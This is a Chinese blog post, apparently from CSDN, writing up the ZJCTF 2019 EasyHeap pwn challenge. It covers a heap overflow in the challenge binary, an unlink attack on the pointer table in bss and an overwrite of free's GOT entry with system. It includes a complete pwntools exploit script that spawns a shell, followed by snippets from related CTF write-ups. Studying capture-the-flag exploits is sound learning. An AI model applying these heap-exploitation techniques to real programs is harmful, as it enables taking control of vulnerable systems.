BUUCTF Pwn [ZJCTF 2019]EasyHeap unlink+freehook做法

于 2025-03-13 22:29:08 发布
阅读量230 收藏
点赞数 2
分类专栏: BUUCTF Pwn 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33348179/article/details/146239060
版权

checksec exeinfo :

IDA64打开:

delete_heap函数已经将指针清零 无UAF

edit_heap允许自己输入读取字节 存在堆溢出

同时 存储的指针位于bss段

那接下来就想到unlink方法:

图示:

后续修改0x6020E0的位置为freehook 再修改一次 让其指向system 最后free掉chunk2 就能执行binsh了

exp:

from pwn import *

p = process('./easyheap')
elf = ELF('./easyheap')

def add(size, cont):
    p.sendlineafter("choice :", b'1')
    p.sendlineafter("Heap : ", str(size))
    p.sendlineafter("heap:", cont)
    

def edit(index, size, cont):
    p.sendlineafter("choice :", b'2')
    p.sendlineafter("Index :", str(index))
    p.sendlineafter("Heap : ", str(size))
    p.sendlineafter("heap : ", cont)

def delete(index):
    p.sendlineafter("choice :", b'3')
    p.sendlineafter("Index :", str(index))

add(0x20, b'aaa' * 0x10)
add(0x100, b'bbb' * 0x10)
add(0x40, b'/bin/sh\x00')

fd = 0x6020e0 - 0x18
bk = 0x6020e0 - 0x10

gdb.attach(p)
pause()

payload = p64(0) + p64(0x21) + p64(fd) + p64(bk) + p64(0x20) + p64(0x110)
edit(0,len(payload) , payload)
pause()
delete(1)

free_got = elf.got['free']
system_plt = elf.plt['system']

edit(0, 0x30, p64(0) * 3 + p64(free_got))
edit(0, 0x8, p64(system_plt))
delete(2)

p.interactive()

[BUUCTF]-PWN:[ZJCTF 2019]EasyHeap解析
2301_79326813的博客
01-12 864
这是buu上的一道堆题,话不多说直接看保护和ida这里有一个要注意的点,那就是它是partial RELRO,Full RELRO开启说明got表不可写,而这里没有,这是我们解题的一个前提。然后看ida。这里不过多解释,主要还是创建堆块,释放堆块,edit堆块,但是没有打印堆块内容的函数。还有一个要注意的点,那就是他有system函数,并且参数似乎可以利用。虽然在我解题的过程中这个函数压根得不到flag,但我还是想从这一角度讲解一下解题思路,所以我分两个角度来讲。
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2922
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
npuctf_2020_easyheap详解
像初雪一样自由洒落
04-25 1030
off by one的题,,, 参考视频:off by one + 改got表的heap做法 例题:npuctf_2020_easyheap 程序流程 create: 申请两个chunk: 一个heaparray[i](固定0x10大小),一个是申请的大小(只能申请0x18或0x38) edit: read_input(heaparray[(signed int)v1][1], *heaparray[(signed int)v1] + 1LL); 存在off by one show:根据id.
DASCTF2022.07赋能赛 - Pwn easyheap
qq_34010404的博客
07-25 1709
DASCTF 2022.07赋能赛
pwn堆题记录(一)
最新发布
qq_47841160的博客
12-24 944
我们的目标是覆盖到heaparray,通过ida可以查看相关参数。如图所示,heaparray的位置在0x6020e0,我们申请的大小是0x68,也就是说szie的地址不能小于0x6020e0-0x70=0x602070,填充中我们可以让fd指向的pre_size在这个范围内任意取值,但是需要保证获得的chunk的pre_size为0x7x。
BUUCTF-[ZJCTF 2019]EasyHeap1
Rt1Text的博客
09-25 1064
经典堆菜单。
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门
weixin_45441024的博客
12-27 737
BUUCTF [ZJCTF 2019]EasyHeap 记第一次堆入门 一般的堆题都是这种表单形式的
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF PWN wp--[第五空间2019 决赛]PWN5
2302_81740139的博客
09-01 1010
在这个上下文中,%10$n表示写入的值将是printf的第10个参数,但由于p32(0x804C044)没有在printf调用中作为参数,它实际上利用了格式化字符串漏洞,将栈上的某个值写入到地址0x804C044。p32函数将32位整数转换为其小端序的字符串表示,这里转换的是地址0x804C044,这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量,其地址是硬编码的(例如,在ELF文件中,地址可能是一个固定的地址)。如果之前的利用成功,这将提供一个shell。
bytectf2020 easyheap
wuyvle的博客
02-07 3391
做一下高版本的堆题目,2.34的glibc符号实在是搞不了,glibc in all one里面下载都是不全的,先做一下2.31的堆吧 经典的菜单题,漏洞在new函数里 堆限制了大小不能超过0x80,并且会有在最后的位置置零,但是这里的size_1是我们自己设置的,也就是说我们可以在任意地方写0,我们先释放7个堆块,把0x90大小的堆块放进unsorted bins里面,然后再申请出来,堆块就会把main_aren带出来,我们打印出来就能得到libc基值,但是堆块会清空原来空闲的堆块,但是和calloc不一
萌新详解[ZJCTF 2019]EasyHeap,带你走进pwn世界
qq_36495104的博客
05-21 2078
安全保护 IDA查看 main int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int v3; // eax char buf; // [rsp+0h] [rbp-10h] unsigned __int64 v5; // [rsp+8h] [rbp-8h] v5 = __readfsqword(0x28u); setvbuf(stdout, 0LL, 2, 0LL); se
LCTF2018 PWN easy_heap 远程环境搭建
哒君的博客
08-08 914
一直很头疼环境的问题,需要目标环境的glibc版本是2.27,而我的是2.23 如果开启第二个虚拟机占用内存太大,所以我选择用docker 于是终于找到了能在libc2.27下工作的gdb插件pwngdb(注意不是那个pwndbg) 所以这个镜像可以作为Tcache机制题目的本地测试容器 GitHub docker镜像:链接:https://pan.baidu.com/s/1eCIbJl3Ig9...
pwn】 hitcontrain_bamboobox && ZJCTF_19_EasyHeap
Nothing
03-06 588
这两个题目类似,放在一起写。 例行检查 没有pie,got表可写。 程序逻辑 edit功能都存在堆溢出,堆指针都保存在bss段上,可以通过unlink对got表进行读写。本来两个程序都存在后门,但是oj在部署的时候路径有点问题,所以就想办法获取shell。 bamboobox存在show功能,可以泄露libc地址。 easyheap刚好程序中存在system函数。 bamboobox from ...
高校战疫网络安全分享赛pwn复盘
doudoudedi
03-10 895
就做了一个pwn我tcl 但是收获很多 woodenbox2 这道题有先是用chunk overlop然后将unsortbin切割到fastbin(此时unsortbin与fastbin指向了同一个堆块)通过堆溢出将低位覆盖为stdout上面的位置然后写IO_FILE结构体leaklibc基址然后通过fastbin attack打malloc_hook即可 IO_FILE结构体的知识可看一下 h...
roarctf_2019_easyheap(文件描述符1关闭后仍然可以交互)
seaaseesa的博客
04-17 665
roarctf_2019_easyheap 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 最开始的时候,我们可以在bss段输入一些数据,这意味着,我们可以在bss段伪造一个chunk show功能必须要满足条件才能使用 Free后没有清空指针,因此存在double free。 666功能也可以创建和free堆,但是有次数限制,但是这个次数限制也存在漏洞,即q...
(补题)LCTF2018 PWN easy_heap超详细讲解
hollk’s blog
02-08 2671
这道题是wiki上tcache attack 的Challenge 1,题目需要自己找一下。尝试上传到优快云上,但总是提示已有,不知道是什么情况。这道题总的来说比较复杂,涉及到的知识点有:tcache分配、unsorted bin分配、堆块合并分割、tcache检查、hook。吐槽一点,堆块的id为什么非得从0开始啊!啊!啊!啊!总的来说收获满满,对tcache这类的题目理解更加深刻了(*^▽^*)
BUUCTF-PWN roarctf_2019_easyheap(double free, stdout重定向)
weixin_44145820的博客
04-23 890
这里写目录标题题目分析漏洞利用Exp 题目分析 有添加,删除,展示三个主要功能,不过添加有次数限制,同时限制了申请大小,使得我们不能申请出unsorted bin范围内的chunk 删除之后没有置空,可以多次free show功能有条件限制,而且会把stdout关了 添加和后门的次数 后门函数可以进行calloc和free,同样没有置空,但是后门函数的次数限制逻辑有问题,即使为0还会再...
buuctf easyheap
weixin_44932880的博客
02-09 555
主要知识 堆块的结构,fastbin任意地址构造堆块的检查机制, 对题目流程的认真分析 1.检查文件没有地址偏移的保护 2.查看功能。 3.通过堆的溢出生成一块假堆块 4.假堆块可覆盖heaparray[0]为free的got表的地址. 5.通过更改heaparray[0]存的堆块的内容,将free的got覆盖为system的地址。 6.调用free函数并在前面将参数填充为"/bin/sh\x0...
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值